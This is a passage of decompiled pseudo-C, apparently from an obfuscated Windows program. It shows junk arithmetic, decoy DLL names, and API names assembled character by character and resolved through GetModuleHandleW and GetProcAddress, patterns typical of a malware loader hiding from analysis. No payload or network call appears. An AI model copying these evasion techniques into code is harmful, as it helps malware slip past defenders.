				intOrPtr _t3679;
				signed int _t3681;
				signed int _t3683;
				signed int _t3685;
				signed int _t3691;
				signed int _t3693;
				intOrPtr _t3695;
				signed int _t3735;
				signed int _t3737;
				intOrPtr _t3739;
				signed int _t3751;
				char* _t3776;
				char* _t3779;
				char* _t3784;
				char* _t3789;
				char* _t3794;
				char* _t3799;
				char* _t3804;
				char* _t3809;
				char* _t3818;
				char* _t3823;
				char* _t3828;
				char* _t3865;
				char* _t3868;
				char* _t3873;
				char* _t3878;
				char* _t3883;
				char* _t3892;
				char* _t3897;
				char* _t3902;
				void* _t3911;
				intOrPtr _t4323;
				intOrPtr* _t4326;
				intOrPtr* _t4329;
				intOrPtr* _t4333;
				intOrPtr* _t4339;
				intOrPtr* _t4343;
				intOrPtr* _t4347;
				intOrPtr _t4351;
				signed int _t4649;
				intOrPtr _t4842;
				intOrPtr _t4896;
				intOrPtr* _t4908;
				intOrPtr* _t4911;
				intOrPtr* _t4915;
				intOrPtr* _t4919;
				intOrPtr* _t4923;
				intOrPtr* _t4927;
				intOrPtr* _t4931;
				intOrPtr* _t4935;
				intOrPtr* _t4941;
				intOrPtr* _t4945;
				intOrPtr* _t4949;
				intOrPtr* _t4961;
				intOrPtr* _t4964;
				intOrPtr* _t4968;
				intOrPtr* _t4974;
				intOrPtr* _t4978;
				intOrPtr* _t4984;
				intOrPtr* _t4988;
				intOrPtr* _t4992;
				intOrPtr* _t4998;
				intOrPtr* _t5002;
				intOrPtr* _t5006;
				intOrPtr* _t5010;
				intOrPtr* _t5016;
				intOrPtr* _t5020;
				intOrPtr* _t5024;
				intOrPtr* _t5028;
				intOrPtr* _t5032;
				intOrPtr* _t5036;
				intOrPtr* _t5040;
				intOrPtr* _t5044;
				intOrPtr* _t5048;
				intOrPtr* _t5054;
				intOrPtr* _t5097;
				intOrPtr* _t5100;
				intOrPtr* _t5104;
				intOrPtr* _t5108;
				intOrPtr* _t5112;
				intOrPtr* _t5116;
				intOrPtr* _t5120;
				intOrPtr* _t5124;
				intOrPtr* _t5130;
				intOrPtr* _t5134;
				intOrPtr* _t5138;
				intOrPtr* _t5154;
				intOrPtr* _t5157;
				intOrPtr* _t5161;
				intOrPtr* _t5165;
				intOrPtr* _t5169;
				intOrPtr* _t5175;
				intOrPtr* _t5179;
				intOrPtr* _t5183;
				intOrPtr _t5190;
				intOrPtr _t5191;
				void* _t5247;
				void* _t5305;
				void* _t5307;
				char _t5349;
				char _t5355;

				_t5188 = __esi;
				_t5187 = __edi;
				_t3910 = __ebx;
				_t5190 = _t5191;
				_t3911 = 0x2a3;
				goto L1;
				L17:
				_push(_t5190);
				_push(0x86ec50);
				_push( *[fs:eax]);
				 *[fs:eax] = _t5191;
				E0040A0C0( &_v12, _v16);
				_t1892 =  *0x8a9b78; // 0x12d6c
				 *0x8a9b18 = _t1892;
				E0040A0C0( &_v12, L"mscat32.dll");
				if(_v56 > _v24) {
					_v72 = 0;
					_v424 = _v68 + 0x6c;
					asm("fild dword [ebp-0x1a4]");
					_v24 = E004076E8();
					asm("fild dword [ebp-0x1c]");
					_v28 = E004076F4();
					asm("fild dword [ebp-0x34]");
					_v40 = E004076E8();
					 *0x8a9b18 =  *0x8a9ba4 * 0x33;
					 *0x8a9b78 =  *0x8a9ad8 * 0xc9;
					_t3751 =  *0x8a9a34; // 0xe22aa3e4
					 *0x8a9a44 = _t3751 + 0xfa;
				}
				 *0x8a9b88 = 0;
				E0085E4BC();
				_t1898 =  *0x8a9f14; // 0x8b0922
				_v81 =  *_t1898;
				if(_v81 + 0x9f - 0x1a < 0) {
					_v81 = _v81 - 0x20;
				}
				_t1903 =  *0x8aa080; // 0x8b0916
				_v82 =  *_t1903;
				if(_v82 + 0x9f - 0x1a < 0) {
					_v82 = _v82 - 0x20;
				}
				_t1908 =  *0x8a9ce4; // 0x8b0912
				_v83 =  *_t1908;
				if(_v83 + 0x9f - 0x1a < 0) {
					_v83 = _v83 - 0x20;
				}
				_t1913 =  *0x8a9cf4; // 0x8b0911
				_v84 =  *_t1913;
				if(_v84 + 0x9f - 0x1a < 0) {
					_v84 = _v84 - 0x20;
				}
				E0040A3C0(0);
				_push(_v528);
				E0040A3C0(0);
				_push(_v532);
				E0040A3C0(0);
				_push(_v536);
				E0040A3C0(0);
				_push(_v540);
				E0040A3C0(0);
				_push(_v544);
				E0040A3C0(0);
				_push(_v548);
				E0040A3C0(0);
				_push(_v552);
				E0040A3C0(0);
				_push(_v556);
				E0040A3C0(0);
				_push(_v560);
				E0040A3C0(0);
				_push(_v564);
				E0040A3C0(0);
				_push(_v568);
				E0040A3C0(0);
				E0040A494( &_v524, _t3910, 0xc, _t5187, _t5188);
				E0040A9E8( &_v12, _v524, _v572);
				E0040A950();
				_push(_v584);
				E0040A950();
				_push(_v588);
				E0040A950();
				_push(_v592);
				E0040A950();
				_push(_v596);
				E0040A950();
				_push(_v600);
				E0040A950();
				_push(_v604);
				E00422C7C(3,  &_v608);
				_push(_v608);
				E00422C7C(2,  &_v612);
				_push(_v612);
				_push(0x86f4dc);
				E0040A950();
				_push(_v616);
				E0040A950();
				_push(_v620);
				E0040A950();
				_push(_v624);
				E0040AC04( &_v580, _t3910, 0xc, _t5187, _t5188);
				E0040AA1C( &_v576, _v580);
				_v8 = GetModuleHandleW(E0040A71C(_v576));
				_v72 = 0;
				do {
					E0040A0C0( &_v12, _v20);
					_v72 = _v72 + 1;
				} while (_v72 != 5);
				_v36 = 0;
				E0085E4BC();
				_v68 = 0;
				do {
					E0040A0C0( &_v12, _v12);
					_v68 = _v68 + 1;
				} while (_v68 != 0xc);
				_v60 = 0;
				while(_v60 < 0xd) {
					_v60 = _v60 + 1;
					E0040A0C0( &_v12, _v16);
					_v64 = 0;
					while(_v64 < 0xc) {
						_v64 = _v64 + 1;
						_v76 = _v24 + _v40;
						_v32 = 0x9c - _v56;
						_t3735 =  *0x8a9a9c; // 0xa3011753
						 *0x8a9ae4 = _t3735 *  *0x8a9a68;
						_t3737 =  *0x8a9b24; // 0xfbe6de1a
						 *0x8a9b5c = _t3737 + 4;
						_t3739 =  *0x8a9ac4; // 0x1cd03eb3
						_v424 = _t3739 + 4;
						asm("fild dword [ebp-0x1a4]");
						 *0x8a9a68 = E004076F4();
						 *0x8a9b14 =  *0x8a9ab4 * 0xc1;
					}
				}
				E0040A0C0( &_v12, _v12);
				 *0x8a9af0 = 0;
				E0085E4BC();
				if(_v8 == 0) {
					E0040A0C0( &_v12, _v12);
					_v72 = 0;
					_t1991 =  *0x8a9b3c; // 0x4d52f553
					 *0x8a9b3c = E00407278(_t1991);
					_t1993 =  *0x8a9a50; // 0x3408bc9
					 *0x8a9b74 = _t1993;
					_t1994 =  *0x8a9b3c; // 0x4d52f553
					__eflags = _t1994 -  *0x8a9b74; // 0xbc98d45f
					if(__eflags < 0) {
						_v24 = _v32 + 0xd;
						asm("fild dword [ebp-0x28]");
						_v40 = E004076F4();
						_v424 = _v28 + 0x98;
						asm("fild dword [ebp-0x1a4]");
						_v68 = E004076E8();
						_t2237 =  *0x8a9a50; // 0x3408bc9
						 *0x8a9b24 = _t2237 + 0x3a;
						_t2239 =  *0x8a9a3c; // 0x5d776cb8
						 *0x8a9ba8 = _t2239 +  *0x8a9b90;
						_t2241 =  *0x8a9b00; // 0xf8c6059a
						_t2242 = _t2241 -  *0x8a99e4;
						__eflags = _t2242;
						 *0x8a9ae0 = _t2242;
					}
					E0040A0C0( &_v12, _v16);
					 *0x8a9b60 =  *0x8a9a50 * 0x89;
					 *0x8a9ae4 = 0;
					E0085E4BC();
					_t2000 =  *0x8a9b84; // 0xfcfc377e
					 *0x8a9b68 = _t2000 + 0x2b;
					 *0x8a9ac8 = 0;
					E0085E4BC();
					_t2004 =  *0x8a9a68; // 0x3662937a
					 *0x8a9b08 = _t2004;
					_pop(_t4323);
					 *[fs:eax] = _t4323;
					_v48 = _v40 * _v36;
					_v64 = 0;
					__eflags = _v64 - 3;
					if(_v64 < 3) {
						_v64 = _v64 + 1;
						__eflags = 0;
						_v68 = 0;
						do {
							_v424 = _v52 + 0x73;
							asm("fild dword [ebp-0x1a4]");
							_v76 = E004076E8();
							_v32 = 0xfa - _v24;
							_t2176 =  *0x8a9b44; // 0x892c9cf8
							 *0x8a9adc = _t2176 + _t2176 * 4 + (_t2176 + _t2176 * 4) * 4;
							_t2179 =  *0x8a9ba8; // 0x50bf15f2
							 *0x8a9ba0 = _t2179 *  *0x8a9a68;
							_t2181 =  *0x8a9a3c; // 0x5d776cb8
							 *0x8a9ae8 = _t2181 +  *0x8a9ba8;
							_t2183 =  *0x8a9af4; // 0xc0b2beda
							_v424 = _t2183 + 0xa1;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9a58 = E004076E8();
							_v68 = _v68 + 1;
							__eflags = _v68 - 0xc;
						} while (_v68 != 0xc);
						E0040ACB4(_v20, _v12);
						if(__eflags != 0) {
							 *0x8a9b90 =  *0x8a9b48 * 0xc2;
							 *0x8a9ab8 =  *0x8a9aa4 * 0x57;
							_t2190 =  *0x8a9a50; // 0x3408bc9
							 *0x8a9b58 = _t2190 + 0x86;
							_t2192 =  *0x8a9b14; // 0xfbe6deb5
							 *0x8a9a84 = _t2192 - 0x81;
							_t2194 =  *0x8a9af4; // 0xc0b2beda
							_v424 = _t2194 + 0x4a;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b28 = E004076E8();
							_t2197 =  *0x8a9ba4; // 0xfcfc3737
							_t2198 = _t2197 + 4;
							__eflags = _t2198;
							 *0x8a9a3c = _t2198;
						} else {
							_t2219 =  *0x8a9b30; // 0x60792cb9
							_v424 = _t2219 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9a88 = E004076F4();
							 *0x8a9b28 =  *0x8a9b20 * 0xe4;
							_t2223 =  *0x8a9b84; // 0xfcfc377e
							 *0x8a9b98 = _t2223 +  *0x8a9ae8;
							 *0x8a9af0 = 0xe -  *0x8a9b70;
							 *0x8a9b98 = 0xa3 -  *0x8a9adc;
							_t2229 =  *0x8a9b18; // 0x194
							 *0x8a9a94 = _t2229 +  *0x8a9a64;
						}
						_t2199 =  *0x8a9b48; // 0xaaba2c
						 *0x8a9a44 = _t2199 -  *0x8a9a54;
						_t2201 =  *0x8a9b3c; // 0x4d52f553
						 *0x8a9b3c = E00407278(_t2201);
						_t2203 =  *0x8a9b84; // 0xfcfc377e
						 *0x8a9b70 = _t2203;
						_t2204 =  *0x8a9b3c; // 0x4d52f553
						__eflags = _t2204 -  *0x8a9b70; // 0x20ba273a
						if(__eflags > 0) {
							_t2205 =  *0x8a9a58; // 0x4192234
							_v424 = _t2205 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b00 = E004076F4();
							_t2208 =  *0x8a9ad4; // 0xba811226
							 *0x8a9bc0 = _t2208 + 0xe9;
							_t2210 =  *0x8a9abc; // 0x11dcea12
							_v424 = _t2210 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9ac8 = E004076F4();
							_t2213 =  *0x8a9ae8; // 0x5
							 *0x8a9b98 = _t2213 - 0x79;
							_t2215 =  *0x8a9a8c; // 0x7acda9e0
							 *0x8a9ab4 = _t2215 + 4;
							_t2217 =  *0x8a9abc; // 0x11dcea12
							 *0x8a9b80 = _t2217 +  *0x8a9ba8;
						}
					}
					_t2009 =  *0x8a9a68; // 0x3662937a
					 *0x8a9aa4 = _t2009;
					_t2010 =  *0x8a9afc; // 0x0
					E0040ACB4(_t2010, L"IMEPADSM.DLL");
					if(__eflags != 0) {
						_t2012 =  *0x8a9b60; // 0x1846cbe
						 *0x8a9a58 = _t2012 - 0x42;
						_t2014 =  *0x8a9bb0; // 0x0
						 *0x8a9b40 = _t2014;
						_t2015 =  *0x8a9b40; // 0x5322b944
						__eflags = _t2015 -  *0x8a9aa4; // 0x58cb7cf7
						if(__eflags < 0) {
							_t2156 =  *0x8a9a84; // 0x87862ac7
							 *0x8a9ac0 = _t2156;
							_t2157 =  *0x8a9b78; // 0x12d6c
							 *0x8a9b6c = _t2157;
							_t2158 =  *0x8a9aa0; // 0x36c714ef
							 *0x8a9a40 = _t2158 -  *0x8a9b48;
							_t2160 =  *0x8a9b90; // 0x50bf15f2
							 *0x8a9b4c = _t2160 + 0x79;
							_t2162 =  *0x8a9b44; // 0x892c9cf8
							_t2163 = _t2162 *  *0x8a9ba8;
							__eflags = _t2163;
							 *0x8a9a54 = _t2163;
							asm("fild dword [0x8a9b2c]");
							 *0x8a9b44 = E004076F4();
						}
					} else {
						E0040ACEC(_v12, 0, 1,  &_v12);
						_t2168 =  *0x8a9a70; // 0x60792d03
						 *0x8a9a40 = _t2168 + 0xf;
					}
					_t2016 =  &_v412;
					_t4326 =  *0x8aa104; // 0x8b0919
					 *((char*)(_t2016 + 1)) =  *_t4326;
					 *_t2016 = 1;
					E0040A324( &_v416,  &_v412);
					_t2019 =  &_v420;
					_t4329 =  *0x8a9fd0; // 0x8b0917
					 *((char*)(_t2019 + 1)) =  *_t4329;
					 *_t2019 = 1;
					E0040A34C( &_v416, 2,  &_v420);
					E0040A324( &_v424,  &_v416);
					_t2024 =  &_v420;
					_t4333 =  *0x8aa15c; // 0x8b091c
					 *((char*)(_t2024 + 1)) =  *_t4333;
					 *_t2024 = 1;
					E0040A34C( &_v424, 3,  &_v420);
					E0040A324( &_v432,  &_v424);
					E0040A34C( &_v432, 4, 0x86f3d4);
					E0040A324( &_v440,  &_v432);
					_t2033 =  &_v420;
					_t4339 =  *0x8aa15c; // 0x8b091c
					 *((char*)(_t2033 + 1)) =  *_t4339;
					 *_t2033 = 1;
					E0040A34C( &_v440, 5,  &_v420);
					E0040A324( &_v448,  &_v440);
					_t2038 =  &_v420;
					_t4343 =  *0x8a9f14; // 0x8b0922
					 *((char*)(_t2038 + 1)) =  *_t4343;
					 *_t2038 = 1;
					E0040A34C( &_v448, 6,  &_v420);
					E0040A324( &_v456,  &_v448);
					_t2043 =  &_v420;
					_t4347 =  *0x8a9f14; // 0x8b0922
					 *((char*)(_t2043 + 1)) =  *_t4347;
					 *_t2043 = 1;
					E0040A34C( &_v456, 7,  &_v420);
					E0040AA98( &_v456);
					_t2048 =  *0x8a9b38; // 0xfcbf7485
					__eflags = _t2048 + 0xf1 -  *0x8a9abc; // 0x11dcea12
					if(__eflags < 0) {
						_t2155 =  *0x8a9a8c * 0xd0;
						__eflags = _t2155;
						 *0x8a9a3c = _t2155;
					}
					__eflags = 0;
					_pop(_t4351);
					 *[fs:eax] = _t4351;
					_push(E0086F3CD);
					E00409D28( &_v5408, 0x16);
					E00409C98( &_v5320);
					E00409D28( &_v5316, 0x4c);
					E00409CBC( &_v4984);
					E00409D28( &_v5012, 7);
					E00409D28( &_v4980, 0x14);
					E00409CF8( &_v4900, 0xb);
					E00409CE0( &_v4856);
					E00409D28( &_v4852, 0x38);
					E00409D28( &_v4624, 5);
					E00409CBC( &_v4628);
					E00409D28( &_v4604, 0x62);
					E00409CE0( &_v4176);
					E00409CF8( &_v4212, 9);
					E00409D28( &_v4172, 0x52);
					E00409D28( &_v3828, 9);
					E00409D28( &_v3844, 4);
					E00409D28( &_v3792, 0x51);
					E00409D28( &_v3456, 0xf);
					E00409D28( &_v3468, 3);
					E00409D28( &_v3396, 0x5a);
					E00409D28( &_v3016, 7);
					E00409D28( &_v3036, 5);
					E00409D28( &_v2988, 0x57);
					E00409D28( &_v2612, 8);
					E00409D28( &_v2640, 7);
					E00409CF8( &_v2580, 0xc);
					E00409CE0( &_v2532);
					E00409D28( &_v2528, 0x4f);
					E00409CBC( &_v2100);
					E00409D28( &_v2212, 0x1c);
					E00409D28( &_v2096, 0x46);
					E00409D28( &_v1740, 2);
					E00409D28( &_v1816, 0x13);
					E00409D28( &_v1732, 0x46);
					E00409D28( &_v1116, 2);
					E00409D28( &_v1080, 9);
					E00409D28( &_v1108, 7);
					E00409D28( &_v1044, 0x54);
					E00409D28( &_v660, 9);
					E00409D28( &_v708, 0xc);
					E00409CF8( &_v624, 0xc);
					E00409CE0( &_v576);
					E00409D28( &_v572, 0xd);
					E00409CBC( &_v376);
					E00409CBC( &_v368);
					E00409CBC( &_v344);
					E00409CBC( &_v328);
					E00409CBC( &_v204);
					E00409CBC( &_v168);
					E00409CBC( &_v148);
					return E00409CF8( &_v20, 3);
				} else {
					asm("fild dword [ebp-0x24]");
					_v56 = E004076E8();
					_v44 = _v64 * 0x8a;
					if(_v60 - _v28 == _v60) {
						E0040A0C0( &_v12, L"wow32.dll");
					}
					_v72 = _v24 + _v76;
					_v36 = 0;
					if(_v36 < 0xc) {
						_v36 = _v36 + 1;
						if(_v44 - _v40 == _v60) {
							E0040A0C0( &_v20, _v12);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v16, _v12);
							E0040ACEC(_v20, 2, 1,  &_v16);
							E0040A0C0( &_v12, _v20);
							E0040A0C0( &_v12, _v12);
						}
					}
					E0040A0C0( &_v12, _v20);
					_t2252 =  *0x8a9f40; // 0x8b0925
					_v85 =  *_t2252;
					if(_v85 + 0x9f - 0x1a < 0) {
						_v85 = _v85 - 0x20;
					}
					_t2257 =  *0x8a9ffc; // 0x8b091a
					_v86 =  *_t2257;
					if(_v86 + 0x9f - 0x1a < 0) {
						_v86 = _v86 - 0x20;
					}
					_t2262 =  *0x8a9f40; // 0x8b0925
					_v87 =  *_t2262;
					if(_v87 + 0x9f - 0x1a < 0) {
						_v87 = _v87 - 0x20;
					}
					_t2267 =  *0x8a9ffc; // 0x8b091a
					_v88 =  *_t2267;
					if(_v88 + 0x9f - 0x1a < 0) {
						_v88 = _v88 - 0x20;
					}
					E0040A3C0(0);
					_push(_v632);
					E0040A3C0(0);
					_push(_v636);
					E0040A3C0(0);
					_push(_v640);
					E0040A3C0(0);
					_push(_v644);
					E0040A3C0(0);
					_push(_v648);
					E0040A3C0(0);
					_push(_v652);
					E0040A3C0(0);
					_push(_v656);
					E0040A3C0(0);
					_push(_v660);
					E0040A3C0(0);
					_push(_v664);
					E0040A3C0(0);
					_push(_v668);
					E0040A3C0(0);
					_push(_v672);
					E0040A3C0(0);
					_push(_v676);
					E0040A3C0(0);
					_push(_v680);
					E0040A3C0(0);
					_push(_v684);
					E0040A3C0(0);
					_push(_v688);
					E0040A3C0(0);
					_push(_v692);
					E0040A3C0(0);
					_push(_v696);
					E0040A3C0(0);
					_push(_v700);
					E0040A3C0(0);
					_push(_v704);
					E0040A3C0(0);
					_push(_v708);
					E0040A494( &_v628, _t3910, 0x14, _t5187, _t5188);
					 *0x8b11d8 = GetProcAddress(_v8, E0040A594(_v628));
					E0040A0C0( &_v12, _v20);
					E0040A0C0( &_v12, L"EP0NS411.DLL");
					_v68 = 0;
					do {
						if(_v56 - _v32 > _v68 - _v32) {
							_v64 = _v40;
							asm("fild dword [ebp-0x38]");
							_v72 = E004076F4();
							_v28 = _v76;
							_v424 = _v56 + 0xee;
							asm("fild dword [ebp-0x1a4]");
							_v32 = E004076E8();
							E0040A0C0( &_v16, _v12);
							E0040A0C0( &_v20, _v20);
						}
						E0040A0C0( &_v12, _v12);
						_v68 = _v68 + 1;
					} while (_v68 != 5);
					E0040ACEC(_v12, 0, 1,  &_v12);
					E0040A0C0( &_v12, _v20);
					E0040A0C0( &_v12, _v12);
					_t2334 =  *0x8a9f40; // 0x8b0925
					_v89 =  *_t2334;
					if(_v89 + 0x9f - 0x1a < 0) {
						_v89 = _v89 - 0x20;
					}
					_t2339 =  *0x8a9d58; // 0x8b0913
					_v90 =  *_t2339;
					if(_v90 + 0x9f - 0x1a < 0) {
						_v90 = _v90 - 0x20;
					}
					_t2344 =  *0x8a9f40; // 0x8b0925
					_v91 =  *_t2344;
					if(_v91 + 0x9f - 0x1a < 0) {
						_v91 = _v91 - 0x20;
					}
					E0040A3C0(0);
					_push(_v716);
					E0040A3C0(0);
					_push(_v720);
					E0040A3C0(0);
					_push(_v724);
					E0040A3C0(0);
					_push(_v728);
					E0040A3C0(0);
					_push(_v732);
					E0040A3C0(0);
					_push(_v736);
					E0040A3C0(0);
					_push(_v740);
					E0040A3C0(0);
					_push(_v744);
					E0040A3C0(0);
					_push(_v748);
					E0040A3C0(0);
					_push(_v752);
					E0040A3C0(0);
					_push(_v756);
					E0040A3C0(0);
					_push(_v760);
					E0040A3C0(0);
					_push(_v764);
					E0040A3C0(0);
					_push(_v768);
					E0040A3C0(0);
					_push(_v772);
					E0040A3C0(0);
					_push(_v776);
					E0040A3C0(0);
					_push(_v780);
					E0040A3C0(0);
					_push(_v784);
					E0040A3C0(0);
					_push(_v788);
					E0040A494( &_v712, _t3910, 0x13, _t5187, _t5188);
					 *0x8b11dc = GetProcAddress(_v8, E0040A594(_v712));
					_v68 = 0;
					do {
						_t2394 =  *0x8a9ce4; // 0x8b0912
						_v92 =  *_t2394;
						if(_v92 + 0x9f - 0x1a < 0) {
							_v92 = _v92 - 0x20;
						}
						_t2399 =  *0x8a9f14; // 0x8b0922
						_v93 =  *_t2399;
						if(_v93 + 0x9f - 0x1a < 0) {
							_v93 = _v93 - 0x20;
						}
						_t2404 =  *0x8a9fbc; // 0x8b0929
						_v94 =  *_t2404;
						if(_v94 + 0x9f - 0x1a < 0) {
							_v94 = _v94 - 0x20;
						}
						E0040A3C0(0);
						_push(_v796);
						E0040A3C0(0);
						_push(_v800);
						E0040A3C0(0);
						_push(_v804);
						E0040A3C0(0);
						_push(_v808);
						E0040A3C0(0);
						_push(_v812);
						E0040A3C0(0);
						_push(_v816);
						E0040A3C0(0);
						_push(_v820);
						E0040A3C0(0);
						_push(_v824);
						E0040A3C0(0);
						_push(_v828);
						E0040A3C0(0);
						_push(_v832);
						E0040A3C0(0);
						_push(_v836);
						E0040A3C0(0);
						_push(_v840);
						E0040A3C0(0);
						_push(_v844);
						E0040A3C0(0);
						_push(_v848);
						E0040A3C0(0);
						_push(_v852);
						E0040A3C0(0);
						_push(_v856);
						_push(0x86f534);
						E0040A3C0(0);
						_push(_v860);
						E0040A3C0(0);
						_push(_v864);
						E0040A3C0(0);
						E0040A494( &_v792, _t3910, 0x14, _t5187, _t5188);
						E0040A9E8( &_v12, _v792, _v868);
						_v68 = _v68 + 1;
					} while (_v68 != 3);
					_t2451 =  *0x8a9ba4; // 0xfcfc3737
					 *0x8a9ba4 = E00407278(_t2451);
					_t2453 =  *0x8a9a34; // 0xe22aa3e4
					 *0x8a9a34 = E00407278(_t2453);
					_t2455 =  *0x8a9a34; // 0xe22aa3e4
					_t5247 = _t2455 -  *0x8a9ba4; // 0xfcfc3737
					if(_t5247 <= 0) {
						_t2456 =  *0x8a9bbc; // 0x6009aad7
						 *0x8a9b98 = _t2456;
						_t2457 =  *0x8a9a34; // 0xe22aa3e4
						__eflags = _t2457 -  *0x8a9b98; // 0xbc98d55c
						if(__eflags <= 0) {
							_t2458 =  *0x8a9ab4; // 0x967faa
							 *0x8a9b6c = _t2458 *  *0x8a9a3c;
							_t2460 =  *0x8a9a54; // 0xedbf3eae
							 *0x8a9a84 = _t2460 +  *0x8a9b00;
							_t2462 =  *0x8a9b50; // 0x36c714d5
							 *0x8a9b3c = _t2462 +  *0x8a9a98;
							 *0x8a9a44 =  *0x8a9ab8 * 0x85;
							 *0x8a9ad8 =  *0x8a9b34 * 0x82;
							_t2466 =  *0x8a9b60; // 0x1846cbe
							_t2467 = _t2466 + 4;
							__eflags = _t2467;
							_v424 = _t2467;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b5c = E004076F4();
						} else {
							_v44 = _v72 * 0x52;
							_v52 = _v48 + _v76;
							_t3691 =  *0x8a9b50; // 0x36c714d5
							 *0x8a9b90 = _t3691 *  *0x8a9a88;
							_t3693 =  *0x8a9b40; // 0x5322b944
							 *0x8a9a94 = _t3693 - 0xa2;
							_t3695 =  *0x8a9b30; // 0x60792cb9
							_v424 = _t3695 + 0x6b;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b38 = E004076E8();
							 *0x8a9bbc = 0xce -  *0x8a9b5c;
						}
						_t2469 =  *0x8a9ab4; // 0x967faa
						 *0x8a9a34 = _t2469;
						__eflags = 0x51;
						 *0x8a9a54 = 0x51 -  *0x8a9a44;
					} else {
						_v56 = _v28 * 0xbe;
					}
					 *0x8a9aec = 0;
					E0085E4BC();
					 *0x8a9a68 =  *0x8a9a54 * 0xc1;
					_t2475 =  *0x8a9b84; // 0xfcfc377e
					 *0x8a9a88 = _t2475 + _t2475 + (_t2475 + _t2475) * 8;
					if(_v56 + _v60 <= _v60) {
						__eflags = _v56 - _v40;
						if(_v56 > _v40) {
							_t3675 =  *0x8a9a98; // 0xb163bd55
							 *0x8a9b78 = _t3675 -  *0x8a9b24;
							_t3677 =  *0x8a9a8c; // 0x7acda9e0
							 *0x8a9a84 = _t3677 + 0xb6;
							_t3679 =  *0x8a9a74; // 0xedbf3fa1
							 *0x8a9b28 = _t3679 +  *0x8a9b64;
							_t3681 =  *0x8a9b34; // 0xedbf3fa1
							 *0x8a9a3c = _t3681 -  *0x8a9b94;
							_t3683 =  *0x8a9b98; // 0xbc98d55c
							 *0x8a9b1c = _t3683 - 0xdb;
							_t3685 =  *0x8a9a34 * 0x3e;
							__eflags = _t3685;
							 *0x8a9b94 = _t3685;
						}
					} else {
						 *0x8a9b28 = 0;
						E0085E4BC();
					}
					_t2481 =  *0x8a9f40; // 0x8b0925
					_v95 =  *_t2481;
					if(_v95 + 0x9f - 0x1a < 0) {
						_v95 = _v95 - 0x20;
					}
					_t2486 =  *0x8aa15c; // 0x8b091c
					_v96 =  *_t2486;
					if(_v96 + 0x9f - 0x1a < 0) {
						_v96 = _v96 - 0x20;
					}
					_t2491 =  *0x8aa1dc; // 0x8b0921
					_v97 =  *_t2491;
					if(_v97 + 0x9f - 0x1a < 0) {
						_v97 = _v97 - 0x20;
					}
					E0040A3C0(0);
					_push(_v876);
					E0040A3C0(0);
					_push(_v880);
					E0040A3C0(0);
					_push(_v884);
					E0040A3C0(0);
					_push(_v888);
					E0040A3C0(0);
					_push(_v892);
					E0040A3C0(0);
					_push(_v896);
					E0040A3C0(0);
					_push(_v900);
					E0040A3C0(0);
					_push(_v904);
					E0040A3C0(0);
					_push(_v908);
					E0040A3C0(0);
					_push(_v912);
					E0040A3C0(0);
					_push(_v916);
					E0040A3C0(0);
					_push(_v920);
					E0040A3C0(0);
					_push(_v924);
					E0040A3C0(0);
					_push(_v928);
					E0040A3C0(0);
					_push(_v932);
					E0040A494( &_v872, _t3910, 0xf, _t5187, _t5188);
					 *0x8b11e0 = GetProcAddress(_v8, E0040A594(_v872));
					_v44 = 0xc1 - _v76;
					_v68 = 0;
					while(_v68 < 0) {
						_v68 = _v68 + 1;
						_v48 = _v60 + 0x37;
						_v36 = 0;
						do {
							_v28 = _v40 - 0xed;
							_t3660 =  *0x8a9b00; // 0xf8c6059a
							_v424 = _t3660 + 4;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9ac8 = E004076F4();
							_t3663 =  *0x8a9ba4; // 0xfcfc3737
							_v424 = _t3663 + 0x1f;
							asm("fild dword [ebp-0x1a4]");
							 *0x8a9b7c = E004076E8();
							_t3666 =  *0x8a9a8c; // 0x7acda9e0
							 *0x8a9a6c = _t3666 + 0x1c;
							_t3668 =  *0x8a99e4; // 0x7c5162fc
							 *0x8a9b20 = _t3668 *  *0x8a9ac8;
							_t3670 =  *0x8a9b38; // 0xfcbf7485
							 *0x8a99e0 = _t3670 -  *0x8a9a6c;
							_v36 = _v36 + 1;
						} while (_v36 != 0xe);
						_t3672 =  *0x8a9a6c; // 0xfbe7a61a
						 *0x8a9b44 = _t3672 -  *0x8a9a74;
						_t3674 =  *0x8a9ba4; // 0xfcfc3737
						 *0x8a9b1c = _t3674;
					}
					E0040A0C0( &_v12, _v16);
					E0040A0C0( &_v12, _v20);
					_t2539 =  *0x8a9b70; // 0x20ba273a
					 *0x8a9ad8 = _t2539 - 0x9d;
					E0040A0C0( &_v12, L"NlsLexicons001a.dll");
					_t2543 =  *0x8a9f40; // 0x8b0925
					_v98 =  *_t2543;
					if(_v98 + 0x9f - 0x1a < 0) {
						_v98 = _v98 - 0x20;
					}
					_t2548 =  *0x8a9fd0; // 0x8b0917
					_v99 =  *_t2548;
					if(_v99 + 0x9f - 0x1a < 0) {
						_v99 = _v99 - 0x20;
					}
					_t2553 =  *0x8aa1dc; // 0x8b0921
					_v100 =  *_t2553;
					if(_v100 + 0x9f - 0x1a < 0) {
						_v100 = _v100 - 0x20;
					}
					E0040A3C0(0);
					_push(_v940);
					E0040A3C0(0);
					_push(_v944);
					E0040A3C0(0);
					_push(_v948);
					E0040A3C0(0);
					_push(_v952);
					E0040A3C0(0);
					_push(_v956);
					E0040A3C0(0);
					_push(_v960);
					E0040A3C0(0);
					_push(_v964);
					E0040A3C0(0);
					_push(_v968);
					E0040A3C0(0);
					_push(_v972);
					E0040A3C0(0);
					_push(_v976);
					E0040A3C0(0);
					_push(_v980);
					E0040A3C0(0);
					_push(_v984);
					E0040A3C0(0);
					_push(_v988);
					E0040A3C0(0);
					_push(_v992);
					E0040A494( &_v936, _t3910, 0xe, _t5187, _t5188);
					 *0x8b11e4 = GetProcAddress(_v8, E0040A594(_v936));
					_t2592 =  *0x8a9f40; // 0x8b0925
					_v101 =  *_t2592;
					if(_v101 + 0x9f - 0x1a < 0) {
						_v101 = _v101 - 0x20;
					}
					_t2597 =  *0x8aa15c; // 0x8b091c
					_v102 =  *_t2597;
					if(_v102 + 0x9f - 0x1a < 0) {
						_v102 = _v102 - 0x20;
					}
					E0040A3C0(0);
					_push(_v1000);
					E0040A3C0(0);
					_push(_v1004);
					E0040A3C0(0);
					_push(_v1008);
					E0040A3C0(0);
					_push(_v1012);
					E0040A3C0(0);
